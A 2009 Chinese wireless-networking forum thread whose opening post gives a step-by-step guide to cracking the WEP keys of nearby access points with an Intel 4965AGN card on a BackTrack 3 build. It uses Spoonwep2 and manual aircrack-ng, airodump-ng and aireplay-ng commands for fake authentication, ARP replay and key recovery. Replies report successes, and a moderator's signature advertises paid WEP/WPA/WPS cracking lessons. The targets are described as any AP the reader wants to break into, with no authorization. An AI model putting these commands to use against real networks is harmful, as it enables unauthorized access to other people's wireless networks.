ubnt解决方案
查看: 51896|回复: 115

〓〓[最新更新]Intel 4965agn 通过MiniBT3.6破解wep的两种方法详述〓〓

[复制链接]

43

回帖

368

积分

41 小时

在线时间

少尉

注册时间
2009-2-10
金币
224 个
威望
11 个
荣誉
1 个

尚未签到

发表于 2009-2-16 02:07 |显示全部楼层
本帖最后由 stoolbug 于 2009-2-26 23:33 编辑

首先说明一下,我是什么都不懂的菜鸟,在坛子里泡了几天后还是对破解感到很迷茫,尤其是我现在用的x61的 intel 4965agn 卡在bt3下无驱动支持,我又不会升级linux核心,非常惆怅。等到bt4出来后支持4965agn了,终于以为看到了希望,不过坛子里关于4965agn的破解说明还是很简略,让我这种菜鸟还是搞不懂,所幸昨天突然发现rockplay的霸天虎3.6.1出来后,才感到4965的春天终于来了,这篇文章算不上原创,因为全是根据各位高手的经验总结出来的,因为没人发过详细的4965破解过程,我来发个贴抛砖引玉一下,希望各位众多的4965兄弟们也积极思考行动起来,为我们的4965开辟破解的道路。

      此文章从最初的下载到制作,一步一步傻瓜式的讲解,希望菜鸟们都能看明白,当然也许过程中会有一些错误甚至是对一些基本术语的错误表达,希望高手们海涵,因为我只是菜鸟。

方法一:用Spoonwep2 破解

1、下载霸天虎3.6.1,下载地址为:http://www.anywlan.com/Soft/2009/704.html ,可用迅雷下载,速度很快。
     在这里非常感谢霸天虎的作者rockplay,没有他将2.6.27.8 内核集成进去,就没有4965的今天,没有他的BT3瘦身(才200多M),我的1G u盘就没有用武之地。

2、制作u盘启动盘(因为4965是内置pci总线的网卡,VM下bt3不支持,而X61又没有光驱,所以只好用u盘启动的方式,不过这恐怕也是总多4965兄弟们只能接受或更觉方便的方式吧):
    将u盘格式化(fat32是可以的)
    将步骤1中下来的Mini-BT3.6.1.iso文件解压,将其中的boot与slax文件夹拷到u盘的根目录下,预行boot目录里的bootinst.bat文件,根据提示一路按任意键即可,很快就制作完成了。

3、重启计算机,在bios中将引导顺序改为u盘为第一引导。
    u盘启动会进入bt3的启动选择界面,直接按回车即可进入bt3桌面

4、打开一个shell(就是“开始菜单”右边的那个小黑图标,也就是我们大家在xp下用的cmd啦)

5、运行如下指令:
    ifconfig -a
    会发现有eth1,lo,wlan0,wmaster0这几个内容,对照自己的4965的mac地址发现wlan0 就是4965网卡,但这个时候看不到mon0,mon1等内容,说明4965的监听模式未被打开,于是进行下面的操作。

6、运行如下指令:
    airmon-ng start wlan0 6
    这一步是打开4965的监听模式,注意此处airmon-ng是连续输入的,中间没有空格,我开始的时候输入的是airmon -ng ,结果总是错误,晕。
    这个指令运行后会出来monitor mode enabled on mon0的提示(也有可能是mon1,mon2,mon3等,一般系统启动后不进行什么网络操作一路按以上过程下来的话就是mon0,反正大家根据自己的来吧。
   
7、运行如下指令:
   spoonwep
   这一步是为了启动spoonwep2破解工具,运行这个指令后会弹出spoonwep2的窗口,在窗口中有3个下拉选择框,第一个选上一步得知的mon0,第二个选normal,第三个选unknown victim,然后点next。

8、点击launch按钮
   这一步就是开始扫描周围的ap信号了。

9、选择扫描出来的某个你想破解的ap,点selection ok按钮。

10、在第一个下拉选择框里选择第二、三、四种模式都可以(教程上是这么说的呵呵),我选的是第二个。然后点launch按钮,就会开始破解的过程啦,在此过程中data值不断增长,剩下的就是时间与耐心了。




方法二:手动输入指令破解:


前6个步骤与方法一相同。

7、输入:airodump-ng --ivs -w 文件名 -c 频道号 mon0
    这一步是在mon0上打开监控台,“文件名”可以任意取,“频道号”是你要监听的频道,也可以不要这一项。

8、新开一个shell,输入:aireplay-ng -1 0 -a APmac -h 4965mac mon0
    这一步是建立4965与待破解ap的伪连接,如果成功会提示连接成功。“APmac”是指待破解ap的mac地址,“4965mac”是指4965网卡的mac地址。

9、输入:aireplay-ng -3 -b APmac -h 4965mac mon0
    这一步是对待破解ap进行-3 arp攻击。

10、新开一个shell,输入:aireplay-ng -5 -b APmac -h 4965mac mon0
    这一步是进行抓包分析,主要是对-3进行辅助,我试过,如果没有这一步的话-3直接成功很困难。这一步运行不久后会提示你yes还是no,一律选yes后回车,会多次提示你,不管它,每次都选yes就行,直到步骤9狂刷屏与步骤7中的data值暴涨为止就可以不用管这一步了。

11、当data值达到10000以上时,新开一个shell,输入:aircrack-ng *.ivs
    这一步是破解当前所有ivs文件,在出来的选项里选择待破解的ap对应的序号即可,很快密码就会出来。


几个需要注意的地方:
1、在步骤6中的airmon-ng 打开监听模式时,wlan0 后面跟的数字要与待破解的频道号相同。
2、如果步骤8中的-1伪连接不能建立成功的话,后面你也不用再继续了,白费功夫而已。而伪连接建立成功与否的因素主要是信号,提醒大家一下,4965的信号很差。
3、data值的暴涨大概在5到15分钟之内,请耐心等待一下。

一个小技巧:
    在做了以上的工作以后data值仍然增长很慢的话可以尝试用另外一个带wifi功能的电脑或手机用错误的密码尝试连接一下待破解ap,我用p990i 的wifi连接过,确实很管用。


评分

2

查看全部评分

30

回帖

80

积分

46 小时

在线时间

新兵上阵

注册时间
2009-1-21
金币
45 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-16 09:23 |显示全部楼层
回去试验下,我的网卡也是这个型号!!!!
回复

使用道具 举报

3425

回帖

3万

积分

2884 小时

在线时间

版主

杰出会员设备暴发户灌水天才

注册时间
2008-7-15
金币
31043 个
威望
136 个
荣誉
51 个
累计签到:27 天
连续签到:0 天
[LV.50]初入江湖
发表于 2009-2-16 09:36 |显示全部楼层
霸天虎 3.6.1 在网卡的支持上面还不错,破解能力好象要弱点(纯个人意见)!
http://shop36546183.taobao.com
欢迎光临“风云007”的淘宝店选择!
HG255D中继路由、3070网卡、5米USB线、14dbi 定向天线
包教会wep、wpa、wpa2、wps 的PJ方法!



回复

使用道具 举报

67

回帖

679

积分

76 小时

在线时间

中尉

注册时间
2008-9-20
金币
600 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-16 09:52 |显示全部楼层
谢谢楼主的的工作
回复

使用道具 举报

19

回帖

40

积分

10 小时

在线时间

新兵上阵

注册时间
2009-2-16
金币
20 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-16 11:01 |显示全部楼层
好消息啊,我的本本上终于能用了
回复

使用道具 举报

12

回帖

112

积分

84 小时

在线时间

上等兵

注册时间
2009-2-15
金币
85 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-2-16 11:51 |显示全部楼层
这位大哥成功了马?
回复

使用道具 举报

43

回帖

145

积分

32 小时

在线时间

上等兵

注册时间
2007-1-8
金币
95 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-16 12:07 |显示全部楼层
等待你的好消息啊
我的R61 4965呵呵
回复

使用道具 举报

19

回帖

53

积分

11 小时

在线时间

上等兵

注册时间
2009-2-14
金币
32 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-16 13:05 |显示全部楼层
正在学习中,正遇到能识别我的瑞银网卡但不能扫描的问题!谢谢
问题找到了,希望能成功!回头说经验^_^
回复

使用道具 举报

17

回帖

38

积分

10 小时

在线时间

新兵上阵

注册时间
2009-1-3
金币
19 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-17 23:14 |显示全部楼层
楼主成功了吗?等你的好消息!
回复

使用道具 举报

69

回帖

146

积分

28 小时

在线时间

上等兵

注册时间
2008-12-29
金币
70 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-17 23:34 |显示全部楼层
兄弟 你放心的睡吧。 你的情况同我。我的卡是760n。配置和你差不多的笔记本。 这个版本确实网卡兼容很好。如果看到抓的包在涨。就一定没有问题。我2小时 抓包3000左右,-2 -4 -5 三种都差不多好像。试了-2 。最后7小时多一点 密码出来了。 还有个不懂的地方就是,7小时后,760n破出了密码。我插上瑞银:cibia版本3887的那种。居然也能用了。并且date狂涨。3分钟不到就出来密码了。然后这几天 我有空就测试。 再也没有碰到这种好事了。现在仍然测试中。。。。。。。。。。。  你睡吧,明天早上肯定有密码的咯!晚安!
回复

使用道具 举报

7

回帖

13

积分

1 小时

在线时间

新兵上阵

注册时间
2009-2-1
金币
6 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-17 23:40 |显示全部楼层
顶顶···································
回复

使用道具 举报

400

回帖

6575

积分

287 小时

在线时间

中校

终身荣誉会员

注册时间
2008-7-22
金币
5950 个
威望
25 个
荣誉
4 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-17 23:49 |显示全部楼层
兄弟 你放心的睡吧。 你的情况同我。我的卡是760n。配置和你差不多的笔记本。 这个版本确实网卡兼容很好。如果看到抓的包在涨。就一定没有问题。我2小时 抓包3000左右,-2 -4 -5 三种都差不多好像。试了-2 。最后7小 ...
qiu2299 发表于 2009-2-17 23:34


好像用一个卡后,再换瑞银,瑞银就可以破解了
http://sjw475.qupan.com/


我的趣盘,内有一些软件和教程。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-5-8 02:58

返回顶部 返回列表